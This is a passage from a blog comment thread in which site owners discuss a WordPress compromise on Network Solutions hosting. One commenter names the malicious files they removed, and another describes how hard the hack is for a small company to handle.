    monthdir.pl
    php.ini
    Check the contents before you do it!
    In my case they were all part of the malicious code.
    For the moment my site is clean and working without troubles.

  31. |

    Add me to the list… This is a total nightmare. I designed my company’s website, and set up the wordpress plugin. I really don’t know that much about websites, and we are a small 10 person engineering company, who really can’t dedicate time/money to this…

  32. |

    [...] Source: Network Solutions and WordPress Security Flaw [...]